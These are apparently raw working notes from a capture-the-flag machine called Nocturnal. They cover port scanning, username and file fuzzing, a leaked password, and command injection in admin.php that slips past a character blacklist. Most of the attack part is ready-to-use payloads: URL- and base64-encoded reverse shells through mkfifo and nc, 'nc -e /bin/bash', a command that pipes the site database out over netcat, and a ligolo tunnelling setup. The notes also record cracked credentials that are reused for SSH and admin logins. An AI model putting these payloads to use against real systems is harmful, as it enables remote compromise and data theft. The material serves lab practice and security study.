1. Nmap

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 20:26:88:70:08:51:ee:de:3a:a6:20:41:87:96:25:17 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDpf3JJv7Vr55+A/O4p/l+TRCtst7lttqsZHEA42U5Edkqx/Kb8c+F0A4wMCVOMqwyR/PaMdmzAomYGvNYhi3NelwIEqdKKnL+5svrsStqb9XjyShPD9SQK5Su7xBt+/TfJyJFRcsl7ZJdfc6xnNHQITvwa6uZhLsicycj0yf1Mwdzy9hsc8KRY2fhzARBaPUFdG0xte2MkaGXCBuI0tMHsqJpkeZ46MQJbH5oh4zqg2J8KW+m1suAC5toA9kaLgRis8p/wSiLYtsfYyLkOt2U+E+FZs4i3vhVxb9Sjl9QuuhKaGKQN2aKc8ItrK8dxpUbXfHr1Y48HtUejBj+AleMrUMBXQtjzWheSe/dKeZyq8EuCAzeEKdKs4C7ZJITVxEe8toy7jRmBrsDe4oYcQU2J76cvNZomU9VlRv/lkxO6+158WtxqHGTzvaGIZXijIWj62ZrgTS6IpdjP3Yx7KX6bCxpZQ3+jyYN1IdppOzDYRGMjhq5ybD4eI437q6CSL20=
|   256 4f:80:05:33:a6:d4:22:64:e9:ed:14:e3:12:bc:96:f1 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLcnMmaOpYYv5IoOYfwkaYqI9hP6MhgXCT9Cld1XLFLBhT+9SsJEpV6Ecv+d3A1mEOoFL4sbJlvrt2v5VoHcf4M=
|   256 d9:88:1f:68:43:8e:d4:2a:52:fc:f0:66:d4:b9:ee:6b (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIASsDOOb+I4J4vIK5Kz0oHmXjwRJMHNJjXKXKsW0z/dy
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://nocturnal.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 21:38
Completed NSE at 21:38, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 21:38
Completed NSE at 21:38, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 21:38
Completed NSE at 21:38, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.99 seconds
           Raw packets sent: 65552 (2.884MB) | Rcvd: 65537 (2.621MB)
                                                                      

2. Port 80

http://nocturnal.htb [200 OK] Cookies[PHPSESSID], Country[RESERVED][ZZ], Email[support@nocturnal.htb], HTML5, HTTPServer[Ubuntu Linux][nginx/1.18.0 (Ubuntu)], IP[10.129.229.19], Title[Welcome to Nocturnal], nginx[1.18.0]


# directory-list-2.3-small.txt [Status: 200, Size: 1524, Words: 272, Lines: 30, Duration: 41ms]
# Suite 300, San Francisco, California, 94105, USA. [Status: 200, Size: 1524, Words: 272, Lines: 30, Duration: 41ms]
# Copyright 2007 James Fisher [Status: 200, Size: 1524, Words: 272, Lines: 30, Duration: 41ms]
# or send a letter to Creative Commons, 171 Second Street, [Status: 200, Size: 1524, Words: 272, Lines: 30, Duration: 41ms]
#                       [Status: 200, Size: 1524, Words: 272, Lines: 30, Duration: 42ms]
# Attribution-Share Alike 3.0 License. To view a copy of this [Status: 200, Size: 1524, Words: 272, Lines: 30, Duration: 42ms]
#                       [Status: 200, Size: 1524, Words: 272, Lines: 30, Duration: 42ms]
# license, visit http://creativecommons.org/licenses/by-sa/3.0/ [Status: 200, Size: 1524, Words: 272, Lines: 30, Duration: 42ms]
                        [Status: 200, Size: 1524, Words: 272, Lines: 30, Duration: 42ms]
#                       [Status: 200, Size: 1524, Words: 272, Lines: 30, Duration: 43ms]
# This work is licensed under the Creative Commons [Status: 200, Size: 1524, Words: 272, Lines: 30, Duration: 43ms]
#                       [Status: 200, Size: 1524, Words: 272, Lines: 30, Duration: 43ms]
# Priority-ordered case-sensitive list, where entries were found [Status: 200, Size: 1524, Words: 272, Lines: 30, Duration: 43ms]
# on at least 3 different hosts [Status: 200, Size: 1524, Words: 272, Lines: 30, Duration: 43ms]
uploads                 [Status: 403, Size: 162, Words: 4, Lines: 8, Duration: 38ms]
backups                 [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 38ms]
                        [Status: 200, Size: 1524, Words: 272, Lines: 30, Duration: 40ms]
uploads2                [Status: 403, Size: 162, Words: 4, Lines: 8, Duration: 40ms]
:: Progress: [87664/87664] :: Job [1/1] :: 1005 req/sec :: Duration: [0:01:30] :: Errors: 0 ::

support@nocturnal.htb

there is an endpoint when downloading that has a user and the file. admin exists because otherwise say “user does not exist”

ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://nocturnal.htb/view.php\?username=FUZZ\&file=lixo.pdf -b PHPSESSID=l8sr22crdivti9qr2hm5sbj1pd -fw 1170

admin and amanda were found!

admin gave nothing

ffuf -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt:FUZZ -u http://nocturnal.htb/view.php\?username=amanda\&file=FUZZ -e .doc,.docx,.dot,.dotx,.rtf,.txt,.odt,.xls,.xlsx,.xlsm,.xlsb,.csv,.ods,.pdf -b PHPSESSID=l8sr22crdivti9qr2hm5sbj1pd -fw 1175,1170 privacy.odt

found amanda:arHkG7HAI68X8s1J

We have access to password

3 .admin.php

On my pc : nc -l -p 4444 -q 1 > root.txt </dev/null

On password we have control to send this:

(cat,../nocturnal_database/nocturnal_database.db)");'

on the admin.php

$command = "zip -x './backups/*' -r -P " . $password . " backupfile.cenas . > logfile.log 2>&1 &";

$blacklist_chars = [';', '&', '|', '$', ' ', '`', '{', '}', '&&'];

password%09backupfile.cenas%09.%09%23%0Abase64%09-d<<<"cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL2Jhc2ggLWkgMj4mMXxuYyAxMC4xMC4xNC4xNjggNDQ0NCA+L3RtcC9m">"view.php"%09#

password%09backupfile.cenas%09.%09%23%0Abase64%09-d%3C%3C%3C%22cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL2Jhc2ggLWkgMj4mMXxuYyAxMC4xMC4xNC4xNjggNDQ0NCA%2BL3RtcC9m%22%3E%22file.sh%22%09

<
password%09backupfile.cenas%09.%09%23%0Abash%3C%22./file.sh%22%09%23



password%09backupfile.cenas%09.%09%0Als%3Efile.php%09%23

password%09backupfile.cenas%09.%09%0cat<'./uploads/privacy.odt'%09%23%09%0A%23

zip -x './backups/*' -r -P password backupfile.cenas . 
ls>'file.php' # backupfile.cenas . > logfile.log 2>&1 &"


password%09backupfile.cenas%09.%09%0Abash%3C%3C%3C%22ping%09-c2%0910.10.14.168%22%09%23
password%09backupfile.cenas%09.%09%23%0Abash%3C%3C%3C%22rm%09%2Ftmp%2Ff%3Bmkfifo%09%2Ftmp%2Ff%3Bcat%09%2Ftmp%2Ff%7C%2Fbin%2Fbash%09-i%092%3E%261%7Cnc%0910.10.14.168%094444%09%3E%2Ftmp%2Ff%22%09%23

mypassword archive.zip ./* ; cat ../nocturnal_database/nocturnal_database.db | nc 10.10.14.168 4444;

2>/dev/null\nnc\t10.10.14.168\t4444\t-e\t/bin/bash\n

password%0A%09cat<../nocturnal_database/nocturnal_database.db>mynewfile.db%09#

from the db tobias:slowmotionapocalypse

reusing password o

4. SSH

tobias:slowmotionapocalypse There is a service on 8080

tunneling:

ligolo-proxy -selfcert -laddr 10.10.14.168:3333
sudo ip tuntap add user dani mode tun ligolo
sudo ip link set ligolo up
sudo ip route add 240.0.0.1/32 dev ligolo

1. On victim -> `./agent -connect 10.10.14.168:3333 -ignore-cert

5. forward 8080

ISPConfig has admin user reusing password slowmotionapocalypse works